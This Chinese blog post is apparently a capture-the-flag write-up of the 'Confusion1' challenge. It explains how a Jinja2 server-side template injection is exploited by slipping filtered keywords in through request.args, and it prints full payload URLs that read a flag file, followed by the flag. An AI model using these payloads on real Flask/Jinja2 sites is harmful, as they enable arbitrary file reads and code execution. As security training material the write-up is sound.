攻防世界Web-Confusion1(ssti绕过)

已于 2025-05-13 18:52:30 修改
阅读量155 收藏 2
点赞数 7
文章标签: 网络安全
于 2025-05-13 18:51:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/happybhs/article/details/147931007
版权

先看了源代码,发现:login.php和register.php都有:

但是逛了半天这玩意也没发现啥可以突破的地方,甚至一点提示都没有。也没有.git。

猜测有ssti,上典图。

好的,突破点来了,是Jinja2或Twig模板。

大佬文章:

Python SSTI漏洞学习总结 - Tuzkizki - 博客园

这龟龟题目,一出现class就报错,过滤是真狗。。。

不过好在大佬们总有办法:

class虽然不能出现在url中,但是利用python参数传递的动态特性绕过。

这种绕过方式还是第一次见。

经典永流传
http://223.112.5.141:61299/{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

由于要打开文件,直接找file(推荐)或system(麻烦)都行。

最后的payload:

http://223.112.5.141:61299/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

flag:cyberpeace{3ac6b4aa13fba390e5219e208e0f95f6}

LanAndShuo
关注
【愚公系列】2023年05月 攻防世界-WebConfusion1
时光隧道
05-27 7955
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
攻防世界Confusion1
wangzhemvp的博客
04-09 722
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界-web-Confusion1
wuh2333的博客
11-22 270
攻防世界webSSTI
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2093
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
攻防世界--Confusion1
m0_67467924的博客
05-30 485
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号被过滤绕过(ctfshow web入门369)
你们de4月天的博客
03-30 3365
ctfshow web入门369 中括号、args、request、花括号、引号、中括号、os被过滤绕过 SSTI模板注入漏洞过滤绕过
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 523
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
攻防世界----confusion1
qq_44418229的博客
07-22 1293
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界Confusion1
qq_45955869的博客
06-08 92
攻防世界Confusion1考察模板注入payload的其他构造方法。
SSTI 攻防世界 Confusion1
weixin_73399382的博客
07-24 936
具体来说,__class__是一个内置属性,表示一个对象所属的类。即""[request.args.__class__]和"".__class__效果是一样的,但是因为在语句中过滤了基础类,我们可以采取变量赋值的方式绕过限制。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)。
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
SSTI模板注入绕过
最新发布
2302_81650222的博客
02-28 937
想要回显内容在外面加个print。
SSTI模块注入】SSTI+Flask+Python(下):绕过过滤
07-25 3242
SSTI绕过过滤
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI绕过
qq_64201116的博客
07-04 3001
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
攻防世界-Confusion1
m0_49025459的博客
02-14 686
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3670
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
flask ssti 的一些黑名单绕过姿势
qq_40800734的博客
06-29 3111
转自https://p0sec.net/index.php/archives/120/ 最近学flask的ssti,看到一些比较好的文章,分享并记录学习一下 0x00 获取基本类 首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request): ''.__class__.__mro__[2] {}.__class__.__bases__[0] ().__class__.__bases__[0] [].__clas.
攻防世界web进阶区 Confusion1 之request.args.key
snowlyzz的博客
05-12 701
又是一道新知识点的题收获很大,现在刷的webctf题都是要依靠大佬的wp,唉,还是太菜了。 刚进页面就蒙蔽了,什么都不知道。扫了一下目录和git 没有任何线索。。 看了下师傅们的WP。 点进去index。php 可以看到报错, 看到url url的信息会在页面上看到,猜测是ssTI注入 具体可以看:SSTI注入查看下源 FLAG文件显示出位置 一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...
攻防世界WEB】难度四星12分进阶题:Confusion1
07-23 847
攻防世界WEB】四星12分
Reactjs项目搭建指南:Ristore-Confusion网站构建解析
#### 1. Babel: Babel是一个JavaScript编译器,主要目的是使浏览器支持ES6及更新版本的JavaScript代码。Babel可以通过转译将新的JavaScript语法转换为旧版浏览器兼容的语法。 #### 2. Webpack: Webpack是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值